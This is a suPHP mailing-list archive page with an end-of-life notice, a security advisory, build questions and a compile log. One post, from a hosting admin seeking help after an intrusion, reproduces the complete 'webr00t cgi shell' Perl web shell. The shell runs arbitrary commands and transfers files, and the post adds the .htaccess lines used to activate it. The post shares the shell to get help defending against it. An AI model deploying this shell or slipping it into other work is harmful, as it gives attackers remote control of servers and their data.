Sebastian Marsching | 22 May 2013 14:29

suPHP End of Life Notice

Dear suPHP community,

suPHP has been around for more than ten years now.

As some of you have noticed, the development activity has declined with 
time, in particular over the last four years.

I started the suPHP project when I was sharing a server with some 
friends and thus we wanted each user to have her individual space. As 
over time servers became cheaper and cheaper, each person started to use 
a server of her own. For about the last six years, I have only been 
using suPHP because my server had been set up this way and there was no 
immediate reason to change.

Thus, I have not been personally interested in further developing suPHP 
for quite some time. In addition to that I hardly found time to take 
care of suPHP in the last few years. I am still very interested and 
active in the idea of open-source software, however as my interests 
shifted, the projects I have been working on lately shifted as well.

If you want to get an idea about which kind of projects I am talking 
about, you might want to have a look at my personal projects at 
http://projects.marsching.org/ and my company's open-source projects at 
http://oss.aquenos.com/.

In conclusion this has left suPHP in a state where it would be 
irresponsible to suggest to users that it is being actively maintained. 
For example the latest security update has been lying around for years 
before actually being released.

(Continue reading)

Aki Tuomi | 20 May 2013 19:37

Patch to allow configure against 2.4 Apache

Hi!

Attached, a small fix for configure.ac to enable compilation on Apache 2.4.

I have tested this myself, and am running apache 2.4 with suphp successfully.

Aki Tuomi
_______________________________________________
suPHP mailing list
suPHP@...
https://lists.marsching.com/mailman/listinfo/suphp
Sebastian Marsching | 20 May 2013 18:39

Security Update Released

Hi,

I just released suPHP 0.7.2, which fixes a security issue present in 
suPHP 0.7.0 and 0.7.1.

The bug existed in the routine handling the display of PHP source files:

When the suPHP_PHPPath was set, mod_suphp would use the specified PHP 
executable to pretty-print PHP source files (MIME type 
x-httpd-php-source or application/x-httpd-php-source).

However, it would not sanitize the environment. Thus a user that was 
allowed to use the SetEnv directive in a .htaccess file (AllowOverride 
FileInfo) could make PHP load a malicious configuration file (e.g. 
loading malicious extensions).

As the PHP process for highlighting the source file was run with the 
privileges of the user Apache HTTPd was running as, a local attacker 
could probably execute arbitrary code with the privileges of this user.

This update fixes the problem by cleaning the environment before calling 
the PHP executable for printing the source code.

I want to thank John Lightsey for reporting this bug.

You can avoid this issue without upgrading by making sure that 
suPHP_PHPPath is not set.

There is a second change in suPHP 0.7.2, which - while not having any 
direct security implications - addresses an issue, where some unwanted 
(Continue reading)
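The fix described above (cleaning the environment before calling the PHP executable), shown as an added example that is not part of the original post and not suPHP's actual patch. The allowlist, the function names and the sample `PHPRC` entry (PHP's documented variable for locating its configuration file) are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed allowlist: the only variables the helper process may inherit. */
static const char *const ENV_ALLOWLIST[] = { "PATH", "LANG", "TZ", NULL };

/* Return 1 if "NAME=value" has a NAME that is on the allowlist. */
static int entry_allowed(const char *entry)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL || eq == entry)
        return 0;                       /* malformed entry: drop it */
    size_t len = (size_t)(eq - entry);
    for (size_t i = 0; ENV_ALLOWLIST[i] != NULL; i++) {
        if (strlen(ENV_ALLOWLIST[i]) == len &&
            strncmp(entry, ENV_ALLOWLIST[i], len) == 0)
            return 1;
    }
    return 0;
}

/* Build a NULL-terminated vector with only allowlisted entries.
 * The strings are borrowed from parent_env; the caller frees the vector. */
char **build_clean_env(char *const parent_env[])
{
    size_t n = 0;
    while (parent_env[n] != NULL)
        n++;
    char **clean = calloc(n + 1, sizeof *clean);
    if (clean == NULL)
        return NULL;
    size_t out = 0;
    for (size_t i = 0; i < n; i++) {
        if (entry_allowed(parent_env[i]))
            clean[out++] = parent_env[i];
    }
    return clean;                       /* calloc left the terminator NULL */
}

/* Run /bin/sh with exactly envp and report whether `var` is set in the
 * child: 1 = set, 0 = unset, -1 = error. `var` must be a trusted name. */
int child_sees_var(char *const envp[], const char *var)
{
    char script[128];
    int n = snprintf(script, sizeof script, "[ -n \"${%s+x}\" ]", var);
    if (n < 0 || (size_t)n >= sizeof script)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "sh", "-c", script, NULL };
        execve("/bin/sh", argv, envp);  /* envp replaces, never merges */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    if (WEXITSTATUS(status) == 0)
        return 1;
    return WEXITSTATUS(status) == 1 ? 0 : -1;
}

int main(void)
{
    /* Constructed sample: a request environment after a SetEnv line in
     * .htaccess added PHP's config-location variable. */
    char *inherited[] = {
        "PATH=/usr/bin:/bin", "LANG=C", "PHPRC=/home/user/conf", NULL
    };
    char **clean = build_clean_env(inherited);
    if (clean == NULL)
        return 1;
    printf("inherited env: PHPRC visible = %d\n",
           child_sees_var(inherited, "PHPRC"));
    printf("cleaned env:   PHPRC visible = %d\n",
           child_sees_var(clean, "PHPRC"));
    free(clean);
    return 0;
}
```

An allowlist is used rather than a blocklist so that any variable not named explicitly is dropped by default.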

Roger Abt | 25 Mar 2013 19:47

CLI - STDIN/STDOUT not defined

Hi Folks

I like to contribute some code to the Joomla-CMS Core. I wrote a little app
that searches for updates and mail to the website owner, if any is available.
So far not bad. Developed on localhost (xampp/windows), tested on a hosting
server (linux/shared).

And the script does not work on the hosting-server, because in a parent's
class constructor (JApplicationCli = designed for commandline) is a statement,
to ensure, that the call is coming from the command-line:

if(!defined('STDOUT') | ! defined(STDIN) | !isset($_SERVER['argv']))
{
	die();
}

On the hosting server, that uses suPHP, I figured out that these two
constants STDIN and STDOUT are not defined, and thus let the script die.

Because the existence of that statement let me assume, that in
php-cli-environments generally these two constants should be defined by
default. Right?

As I am not a server geek, my questions are (and hopefully someone has an
answer):

- is this statement wrong because these constants must not necessarily are
(Continue reading)

r r | 22 Jan 2013 16:09

suPHP bypass Hack

Dear suPHP Users,

We have been using suPHP for years on our shared hosting servers with success until today.

Also we use http://help.directadmin.com/item.php?id=247 for installation.

Code:
Safe Mode OFF
Open BaseDir ON
disable_functions:exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source
exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source
/tmp noexec
chgrp apache /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python
chmod 705 /usr/bin/perl /usr/bin/wget /usr/local/bin/wget /usr/local/bin/curl /usr/bin/curl /usr/bin/python

They scan old Joomla installations like 1.5.x 1.6.x 1.7.x and slipstream an upload file into the folder images/stories/* and replace all the index.* files on the server.

Yes, I know users always need to update their Joomla to the last stable version.

But my biggest concern now is how they bypass suPHP. It has worked great for years, but it seems the hackers found a way to bypass this security.

Back in the days with CLI modes they always did the same trick, so that's why we switched to suPHP CGI/FastCGI modes.

They use tooling named webr00t cgi shell and make a symbolic link to /root

Is there someone with the same problem?

The script at cgiweb/web.root:


#!/usr/bin/perl -I/usr/local/bandmain
#------------------------------------------------------------------------------
# <b style="color:black;background-color:#ffff66">webr00t cgi shell</b> # server
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "webr00t";        # Change this. You will need to enter this
                # to login.

$WinNT = 0;            # You need to change the value of this to 1 if
                # you're running this script on a Windows NT
                # machine. If you're running it on Unix, you
                # can leave the value as it is.

$NTCmdSep = "&";        # This character is used to seperate 2 commands
                # in a command line on Windows NT.

$UnixCmdSep = ";";        # This character is used to seperate 2 commands
                # in a command line on Unix.

$CommandTimeoutDuration = 10;    # Time in seconds after commands will be killed
                # Don't set this to a very large value. This is
                # useful for commands that may hang or that
                # take very long to execute, like "find /".
                # This is valid only on Unix servers. It is
                # ignored on NT Servers.

$ShowDynamicOutput = 1;        # If this is 1, then data is sent to the
                # browser as soon as it is output, otherwise
                # it is buffered and send when the command
                # completes. This is useful for commands like
                # ping, so that you can see the output as it
                # is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
    local (*in) = <at> _ if <at> _;
    local ($i, $loc, $key, $val);
   
    $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

    if($ENV{'REQUEST_METHOD'} eq "GET")
    {
        $in = $ENV{'QUERY_STRING'};
    }
    elsif($ENV{'REQUEST_METHOD'} eq "POST")
    {
        binmode(STDIN) if $MultipartFormData & $WinNT;
        read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
    }

    # handle file upload data
    if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
    {
        $Boundary = '--'.$1; # please refer to RFC1867
        <at> list = split(/$Boundary/, $in);
        $HeaderBody = $list[1];
        $HeaderBody =~ /\r\n\r\n|\n\n/;
        $Header = $`;
        $Body = $';
         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
        $in{'filedata'} = $Body;
        $Header =~ /filename=\"(.+)\"/;
        $in{'f'} = $1;
        $in{'f'} =~ s/\"//g;
        $in{'f'} =~ s/\s//g;

        # parse trailer
        for($i=2; $list[$i]; $i++)
        {
            $list[$i] =~ s/^.+name=$//;
            $list[$i] =~ /\"(\w+)\"/;
            $key = $1;
            $val = $';
            $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} = $val;
        }
    }
    else # standard post data (url encoded, not multipart)
    {
        <at> in = split(/&/, $in);
        foreach $i (0 .. $#in)
        {
            $in[$i] =~ s/\+/ /g;
            ($key, $val) = split(/=/, $in[$i], 2);
            $key =~ s/%(..)/pack("c", hex($1))/ge;
            $val =~ s/%(..)/pack("c", hex($1))/ge;
            $in{$key} .= "\0" if (defined($in{$key}));
            $in{$key} .= $val;
        }
    }
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
    $EncodedCurrentDir = $CurrentDir;
    $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
    print "Content-type: text/html\n\n";
    print <<END;
<html>
<head>
<title>webr00t cgi shell</title>
$HtmlMetaHeader

<meta name="keywords" content="W£ßRooT,webr00t,webr00t.info,hacker">
<meta name="description" content="W£ßRooT,webr00t,webr00t.info,hacker">
</head>
<body onLoad="document.f. <at> _.focus()" bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FF0000">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#FFFFFF" bordercolor="#FFFFFF" align="center" width="1%">
<b><font size="2">#</font></b></td>
<td bgcolor="#FFFFFF" width="98%"><font face="Verdana" size="2"><b>
<b style="color:black;background-color:#ffff66">webr00t cgi shell</b> Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#FFFFFF"><font face="Verdana" size="2">

<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#FF0000">Upload File</font></a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#FF0000">Download File</font></a> |
<a href="$ScriptLocation?a=logout"><font color="#FF0000">Disconnect</font></a> |
</font></td>
</tr>
</table>
<font size="3">
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
    $Message = q$<pre><img border="0" src="http://img810.imageshack.us/img810/8043/webr00t12.png"></pre><br><br></font><h1>Sifre=webr00t</h1>
$;
#'
    print <<END;
<code>

Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
    print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
    print <<END;
<code>

<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
</font>
<font size="3">
login: <b style="color:black;background-color:#ffff66">webr00t cgi shell</b><br>
password:</font><font color="#009900" size="3"><input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
    print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
    <at> httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
    foreach $cookie( <at> httpcookies)
    {
        ($id, $val) = split(/=/, $cookie);
        $Cookies{$id} = $val;
    }
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
    print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
    print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
    &PrintPageHeader("p");
    &PrintLogoutScreen;

    &PrintLoginScreen;
    &PrintLoginForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
    if($LoginPassword eq $Password) # password matched
    {
        print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
        &PrintPageHeader("c");
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # password didn't match
    {
        &PrintPageHeader("p");
        &PrintLoginScreen;
        if($LoginPassword ne "") # some password was entered
        {
            &PrintLoginFailedMessage;

        }
        &PrintLoginForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>

END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
    $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
    print <<END;
<code>

<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
    if(!$WinNT)
    {
        alarm(0);
        print <<END;
</xmp>

<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
        exit;
    }
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
    if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
    {
        # we change the directory internally. The output of the
        # command is not displayed.
       
        $OldDir = $CurrentDir;
        $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
        chop($CurrentDir = `$Command`);
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$OldDir> " : "[admin\ <at> $ServerName $OldDir]\$ ";
        print "$Prompt $RunCommand";
    }
    else # some other command, display the output
    {
        &PrintPageHeader("c");
        $Prompt = $WinNT ? "$CurrentDir> " : "[admin\ <at> $ServerName $CurrentDir]\$ ";
        print "$Prompt $RunCommand<xmp>";
        $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
        if(!$WinNT)
        {
            $SIG{'ALRM'} = \&CommandTimeout;
            alarm($CommandTimeoutDuration);
        }
        if($ShowDynamicOutput) # show output as it is generated
        {
            $|=1;
            $Command .= " |";
            open(CommandOutput, $Command);
            while(<CommandOutput>)
            {
                $_ =~ s/(\n|\r\n)$//;
                print "$_\n";
            }
            $|=0;
        }
        else # show output after command completes
        {
            print `$Command`;
        }
        if(!$WinNT)
        {
            alarm(0);
        }
        print "</xmp>";
    }
    &PrintCommandLineInputForm;
    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
    local($FileUrl) = <at> _;
    if(-e $FileUrl) # if the file exists
    {
        # encode the file link so we can send it to the browser
        $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
        $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
        &PrintPageHeader("c");
        print <<END;
<code>

Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
END
        &PrintCommandLineInputForm;
        &PrintPageFooter;
    }
    else # file doesn't exist
    {
        &PrintPageHeader("f");
        print "Failed to download $FileUrl: $!";
        &PrintFileDownloadForm;
        &PrintPageFooter;
    }
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
    local($SendFile) = <at> _;
    if(open(SENDFILE, $SendFile)) # file opened for reading
    {
        if($WinNT)
        {
            binmode(SENDFILE);
            binmode(STDOUT);
        }
        $FileSize = (stat($SendFile))[7];
        ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
        print "Content-Type: application/x-unknown\n";
        print "Content-Length: $FileSize\n";
        print "Content-Disposition: attachment; filename=$1\n\n";
        print while(<SENDFILE>);
        close(SENDFILE);
    }
    else # failed to open file
    {
        &PrintPageHeader("f");
        print "Failed to download $SendFile: $!";
        &PrintFileDownloadForm;

        &PrintPageFooter;
    }
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
    # if no file is specified, print the upload form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileUploadForm;
        &PrintPageFooter;
        return;
    }
    &PrintPageHeader("c");

    # start the uploading process
    print "Uploading $TransferFile to $CurrentDir...<br>";

    # get the fullly qualified pathname of the file to be created
    chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
    $TransferFile =~ m!([^/^\\]*)$!;
    $TargetName .= $PathSep.$1;

    $TargetFileSize = length($in{'filedata'});
    # if the file exists and we are not supposed to overwrite it
    if(-e $TargetName && $Options ne "overwrite")
    {
        print "Failed: Destination file already exists.<br>";
    }
    else # file is not present
    {
        if(open(UPLOADFILE, ">$TargetName"))
        {
            binmode(UPLOADFILE) if $WinNT;
            print UPLOADFILE $in{'filedata'};
            close(UPLOADFILE);
            print "Transfered $TargetFileSize Bytes.<br>";
            print "File Path: $TargetName<br>";
        }
        else
        {
            print "Failed: $!<br>";
        }
    }
    print "";
    &PrintCommandLineInputForm;

    &PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
    # if no file is specified, print the download form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        &PrintFileDownloadForm;
        &PrintPageFooter;
        return;
    }
   
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
    &PerformLogin;

}
elsif($Action eq "command") # user wants to run a command
{
    &ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
    &UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
    &DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
    &PerformLogout;
}

And they place .htaccess:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root

I hope there is some fix.

Thanks for your feedback.

Greetings remco
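
A defender-side check for the .htaccess quoted above, added here as an example (it is not part of the original post). It flags per-directory overrides that turn on CGI execution, symlink following, or a CGI handler mapping; the function name, flag names and the scanning approach are assumptions, and the sample text is the .htaccess from the post.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define FLAG_EXECCGI     0x1u  /* Options ... ExecCGI            */
#define FLAG_FOLLOWSYM   0x2u  /* Options ... FollowSymLinks     */
#define FLAG_CGI_HANDLER 0x4u  /* extension mapped to CGI handler */

/* The .htaccess quoted in the post, embedded as sample input. */
static const char SAMPLE_HTACCESS[] =
    "Options FollowSymLinks MultiViews Indexes ExecCGI\n"
    "\n"
    "AddType application/x-httpd-cgi .root\n"
    "\n"
    "AddHandler cgi-script .root\n";

/* Case-insensitive match of one whitespace-delimited token in `args`.
 * A leading '+' is accepted (enables an option); '-' tokens never match. */
static int has_token(const char *args, const char *tok)
{
    size_t tl = strlen(tok);
    const char *p = args;
    while (*p) {
        while (*p && isspace((unsigned char)*p))
            p++;
        const char *start = p;
        while (*p && !isspace((unsigned char)*p))
            p++;
        size_t len = (size_t)(p - start);
        if (len > 0 && *start == '+') {
            start++;
            len--;
        }
        if (len == tl && strncasecmp(start, tok, tl) == 0)
            return 1;
    }
    return 0;
}

/* Return 1 if line `p` starts with directive `name` followed by a space. */
static int is_directive(const char *p, const char *name)
{
    size_t nl = strlen(name);
    return strncasecmp(p, name, nl) == 0 && isspace((unsigned char)p[nl]);
}

/* Scan .htaccess text and return a bitmask of risky overrides found. */
unsigned audit_htaccess(const char *text)
{
    unsigned flags = 0;
    char line[512];
    while (*text) {
        size_t n = strcspn(text, "\n");
        size_t copy = n < sizeof line - 1 ? n : sizeof line - 1;
        memcpy(line, text, copy);
        line[copy] = '\0';
        text += n;
        if (*text == '\n')
            text++;

        const char *p = line;
        while (isspace((unsigned char)*p))
            p++;
        if (*p == '#' || *p == '\0')
            continue;                   /* comment or blank line */

        if (is_directive(p, "Options")) {
            if (has_token(p + 7, "ExecCGI"))
                flags |= FLAG_EXECCGI;
            if (has_token(p + 7, "FollowSymLinks"))
                flags |= FLAG_FOLLOWSYM;
        } else if (is_directive(p, "AddHandler")) {
            if (has_token(p + 10, "cgi-script"))
                flags |= FLAG_CGI_HANDLER;
        } else if (is_directive(p, "AddType")) {
            if (has_token(p + 7, "application/x-httpd-cgi"))
                flags |= FLAG_CGI_HANDLER;
        }
    }
    return flags;
}

int main(void)
{
    unsigned f = audit_htaccess(SAMPLE_HTACCESS);
    printf("ExecCGI=%d FollowSymLinks=%d CGI handler=%d\n",
           !!(f & FLAG_EXECCGI), !!(f & FLAG_FOLLOWSYM),
           !!(f & FLAG_CGI_HANDLER));
    return f ? 1 : 0;
}
```

These directives only take effect in .htaccess where the server configuration's AllowOverride permits Options and FileInfo, so a hit also points at an override policy worth tightening.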

michal | 26 Dec 2012 14:58

(no subject)

Does suPHP support HTTP Authentication Header?
jaseemkvt | 9 Oct 2012 05:38

ERROR-SUPHP-0.7.1-COMPILATION

Hi All,
While I am trying to compile suphp-0.7.1 with apache-2.4.3 I got the following errors. Please help me by giving your valuable suggestions.


[root@mr suphp-0.7.1]# ./configure --prefix=/lamp/suphp --with-apxs=/lamp/apache/bin/apxs --with-apache-user=daemon --with-logfile=/var/log/httpd/suphp_log --with-setid-mode=paranoid --sysconfdir=/etc --with-apr=/lamp/apache/bin/apr-1-config --with-php=/lamp/php/bin/php-cgi --enable-suphp_USE_USERGROUP=yes
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking whether build environment is sane... yes
checking for a BSD-compatible install... /usr/bin/install -c
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for style of include used by make... GNU
checking dependency style of gcc... gcc3
checking for g++... g++
checking whether we are using the GNU C++ compiler... yes
checking whether g++ accepts -g... yes
checking dependency style of g++... gcc3
checking build system type... x86_64-unknown-linux-gnu
checking host system type... x86_64-unknown-linux-gnu
checking for a sed that does not truncate output... /bin/sed
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ld used by gcc... /usr/bin/ld
checking if the linker (/usr/bin/ld) is GNU ld... yes
checking for /usr/bin/ld option to reload object files... -r
checking for BSD-compatible nm... /usr/bin/nm -B
checking whether ln -s works... yes
checking how to recognize dependent libraries... pass_all
checking how to run the C preprocessor... gcc -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking dlfcn.h usability... yes
checking dlfcn.h presence... yes
checking for dlfcn.h... yes
checking how to run the C++ preprocessor... g++ -E
checking for g77... no
checking for xlf... no
checking for f77... no
checking for frt... no
checking for pgf77... no
checking for cf77... no
checking for fort77... no
checking for fl32... no
checking for af77... no
checking for xlf90... no
checking for f90... no
checking for pgf90... no
checking for pghpf... no
checking for epcf90... no
checking for gfortran... no
checking for g95... no
checking for xlf95... no
checking for f95... no
checking for fort... no
checking for ifort... no
checking for ifc... no
checking for efc... no
checking for pgf95... no
checking for lf95... no
checking for ftn... no
checking whether we are using the GNU Fortran 77 compiler... no
checking whether  accepts -g... no
checking the maximum length of command line arguments... 98304
checking command to parse /usr/bin/nm -B output from gcc object... ok
checking for objdir... .libs
checking for ar... ar
